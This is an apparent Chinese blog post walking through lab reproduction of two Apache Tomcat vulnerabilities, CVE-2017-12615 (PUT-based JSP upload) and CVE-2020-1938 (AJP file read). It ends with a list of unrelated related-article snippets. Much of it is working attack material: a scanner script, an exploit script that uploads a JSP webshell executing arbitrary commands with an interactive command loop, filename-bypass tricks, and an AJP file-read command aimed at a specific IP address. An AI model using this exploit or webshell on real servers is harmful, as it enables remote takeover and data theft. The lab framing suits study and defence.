Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938)

复现环境

采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败

CVE-2017-12615 文件上传

漏洞简介

当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。

影响范围

Apache Tomcat 7.0.0 - 7.0.79

漏洞复现

环境启动后,抓包将GET方法改为PUT方法,将木马文件内容放在PUT最后

木马文件使用哥斯拉冰蝎等webshell管理工具生成,将文件内容填入即可。使用工具连接

方法二(适用于Windows系统)

添加文件名2.jsp%20,添加shell脚本

方法三(适用于Windows系统)

添加文件名3.jsp::$DATA,添加shell脚本

POC

使用方法

  1. python3 CVE-2017-12615 POC.py -u http://xxxx -p端口
  1. #CVE-2017-12615 POC
  2. __author__ = '纸机'
  3. import requests
  4. import optparse
  5. import os
  6. parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
  7. parse.add_option('-u','--url',dest='URL',help='target url')
  8. parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
  9. parse.add_option('-f',dest='FILE',help='target list')
  10. options,args = parse.parse_args()
  11. #print(options)
  12. #验证参数是否完整
  13. if (not options.URL or not options.PORT) and not options.FILE:
  14. print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port] [-f FILE]\n')
  15. exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
  16. filename = '/hello.jsp'
  17. #测试数据
  18. data = 'hello'
  19. #提交PUT请求
  20. #resp = requests.post(url1,headers=headers,data=data)
  21. #验证文件是否上传成功
  22. #response = requests.get(url2)
  23. #上传文件
  24. def upload(url):
  25. try:
  26. response = requests.put(url+filename+'/',data=data)
  27. return 1
  28. except Exception as e:
  29. print("[-] {0} 连接失败".format(url))
  30. return 0
  31. def checking(url):
  32. try:
  33. #验证文件是否上传成功
  34. response = requests.get(url+filename)
  35. #print(url+filename)
  36. if response.status_code == 200 and 'hello' in response.text:
  37. print('[+] {0} 存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
  38. else:
  39. print('[-] {0} 不存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
  40. except Exception as e:
  41. #print(e)
  42. print("[-] {0} 连接失败".format(url))
  43. if options.FILE and os.path.exists(options.FILE):
  44. with open(options.FILE) as f:
  45. urls = f.readlines()
  46. #print(urls)
  47. for url in urls:
  48. url = str(url).replace('\n', '').replace('\r', '').strip()
  49. if upload(url) == 1:
  50. checking(url)
  51. elif options.FILE and not os.path.exists(options.FILE):
  52. print('[-] {0} 文件不存在'.format(options.FILE))
  53. else:
  54. #上传链接
  55. url = options.URL+':'+options.PORT
  56. if upload(url) == 1:
  57. checking(url)

EXP

使用方法

  1. python3 CVE-2017-12615 EXP.py -u http://xxxx-p 端口
  1. #CVE-2017-12615 EXP
  2. __author__ = '纸机'
  3. import requests
  4. import optparse
  5. import time
  6. parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT]')
  7. parse.add_option('-u','--url',dest='URL',help='target url')
  8. parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
  9. options,args = parse.parse_args()
  10. #验证参数是否完整
  11. if not options.URL or not options.PORT:
  12. print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]\n')
  13. exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
  14. url = options.URL+':'+options.PORT
  15. filename = '/backdoor.jsp'
  16. payload = filename+'?pwd=023&i='
  17. headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"}
  18. #木马
  19. data = '''<%
  20. if("023".equals(request.getParameter("pwd"))){
  21. java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
  22. int a = -1;
  23. byte[] b = new byte[2048];
  24. out.print("<pre>");
  25. while((a=in.read(b))!=-1){
  26. out.println(new String(b));
  27. }
  28. out.print("</pre>");
  29. }
  30. %>'''
  31. #上传木马文件
  32. def upload(url):
  33. print('[*] 目标地址:'+url)
  34. try:
  35. respond = requests.put(url+filename+'/',headers=headers,data = data)
  36. #print(respond.status_code)
  37. if respond.status_code == 201 or respond.status_code == 204:
  38. #print('[*] 目标地址:'+url)
  39. print('[+] 木马上传成功')
  40. except Exception as e:
  41. print('[-] 上传失败')
  42. return 0
  43. #命令执行
  44. def attack(url,cmd):
  45. try:
  46. respond = requests.get(url+payload+cmd)
  47. if respond.status_code == 200:
  48. print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())
  49. except Exception as e:
  50. print('[-] 命令执行错误')
  51. if upload(url) == 0:
  52. exit()
  53. time.sleep(0.5)
  54. print('输入执行命令(quit退出):')
  55. while(1):
  56. cmd = input('>>>')
  57. if(cmd == 'quit'):
  58. break
  59. attack(url,cmd)

CVE-2020-1938 文件包含

漏洞简介

Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行

影响范围

Tomcat 6.*

Tomcat 7.* < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

漏洞复现

只要使用了tomcat中间件,并使用了AJP协议(默认端口8009),符合漏洞版本就可以尝试复现。

  1. python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176 -p 35839 -f WEB-INF/web.xml

-f参数选择要包含的文件

以上内容仅作学习记录,如有错误或瑕疵,欢迎批评指正,感谢阅读。

Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938)的更多相关文章

  1. PHP核心编程--文件上传(包含多文件上传)

    一.单文件上传 图片上传界面: <!DOCTYPE html> <html lang="en"> <head> <meta charset ...

  2. 通达OA任意文件上传+文件包含GetShell/包含日志文件Getshell

    0x01 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠.数据存取集中控制,避免了数据泄漏的可能.提供数据备份工具,保护系统数据安全.多级 ...

  3. 解决 tomcat 重启上传文件消失

    开发模式 首先开发者模式下,部署在 Tomcat 上没有什么好的办法,否则无法调试 除非使用绝对路径,缺点:不同的操作系统路径不同,自动设置 对于图片上传一般我们使用图片服务器,上传 CDN中 一般获 ...

  4. Tomcat 配置上传文件到项目外的路径

    使用 Tomcat 作为服务器的时候,将上传文件保存在项目路径下,每次重启服务或者打成 war 包的时候很容易丢失上传的文件,于是我们配置 Tomcat 把文件保存到项目外的其他磁盘路径: 1. 打开 ...

  5. django中处理文件上传文件

    1 template模版文件uploadfile.html 特别注意的是,只有当request方法是POST,且发送request的<form>有属性enctype="multi ...

  6. MVC文件上传文件限制

    最近想实现MVC中文件上传限制,总觉得有便利的方法,找了半天就找到加属性accept <input type="file" id="file" name= ...

  7. 【收集】JAVA多文件 上传文件接口代码 -兼容app

    原文:http://www.verydemo.com/demo_c143_i23854.html 我们在 multifile 中可以很容易的发现如何使用,这里就简单说说了,首先在页面上我们需要有这样几 ...

  8. Struts2框架下的文件上传文件类型、名称约定

    Struts2框架下的文件上传机制:1.通过multipart/form-data form提交文件到服务器2.文件名是通过什么地方设置的?在strust2的FileUploadInterceptor ...

  9. java http下载文件/上传文件保存

    private boolean downloadFile(String httpUrl, String savePath) { int byteread = 0; try { URL url = ne ...

  10. iOS文件上传文件URL错误Invalid parameter not satisfying: fileURL'

    一:iOS文件上传提示URL错误 Invalid parameter not satisfying: fileURL' 二:解决方法: NSString *imagePath = [[NSBundle ...

随机推荐

  1. 【Azure K8S】AKS升级 Kubernetes version 失败问题的分析与解决

    问题描述 创建Azure Kubernetes Service服务后,需要升级AKS集群的 kubernetes version.在AKS页面的 Cluster configuration 页面中,选 ...

  2. GPT3的应用领域:机器翻译、文本生成、文本摘要

    目录 1. 引言 2. 技术原理及概念 3. 实现步骤与流程 3.1 准备工作:环境配置与依赖安装 3.2 核心模块实现 3.3 集成与测试 4. 应用示例与代码实现讲解 4.1 机器翻译 4.2 文 ...

  3. Python运维开发之路《WEB框架:Django》

    一.Web框架的本质 所有的web框架.web请求:本质上都是:socket 浏览器:socket客户端 服务器:socket服务端 1. socket服务端 import socket def ha ...

  4. 将 -Xms 参数设置和-Xmx 参数的相等,对比 -Xms参数 设置为-Xmx 参数的一半,有哪些优势?

    将 -Xms 参数设置为与 -Xmx 参数相等,相比于将 -Xms 参数设置为 -Xmx 参数的一半,具有以下优势: 1. 程序启动时间更短 当将 -Xms 参数设置为与 -Xmx 参数相等时,JVM ...

  5. Java杂记————object.getClass()和object.class以及Java中的toString()方法的的区别

    不说废话,直接上干货: (注意大小写:object为对象,Object为类) 1,object.getClass()它是Object类的实例方法,返回一个对象运行时的类的Class对象,换句话说,它返 ...

  6. 白嫖一个WebAPI限流解决方案

    什么是API限流: API 限流是限制用户在一定时间内 API 请求数量的过程.应用程序编程接口 (API) 充当用户和软件应用程序之间的网关.例如,当用户单击社交媒体上的发布按钮时,点击该按钮会触发 ...

  7. YOLOX目标检测实战:LabVIEW+YOLOX ONNX模型实现推理检测(含源码)

    目录 前言 一.什么是YOLOX 二.环境搭建 1.部署本项目时所用环境: 2.LabVIEW工具包下载及安装: 三.模型的获取与转化[推荐方式一] 1.方式一:直接在官网下载yolox的onnx模型 ...

  8. Parallel 与 ConcurrentBag<T> 这对儿黄金搭档

    〇.前言 日常开发中经常会遇到数据统计,特别是关于报表的项目.数据处理的效率和准确度当然是首要关注点. 本文主要介绍,如何通过 Parallel 来并行处理数据,并组合 ConcurrentBag&l ...

  9. 【调制解调】FM 调频

    说明 学习数字信号处理算法时整理的学习笔记.同系列文章目录可见 <DSP 学习之路>目录,代码已上传到 Github - ModulationAndDemodulation.本篇介绍 FM ...

  10. 【技术实战】Vue技术实战【一】

    需求实战一 组件来源 ant-design-vue Button 按钮 Progress 进度条 效果展示 代码展示 <template> <ARow> <ACol> ...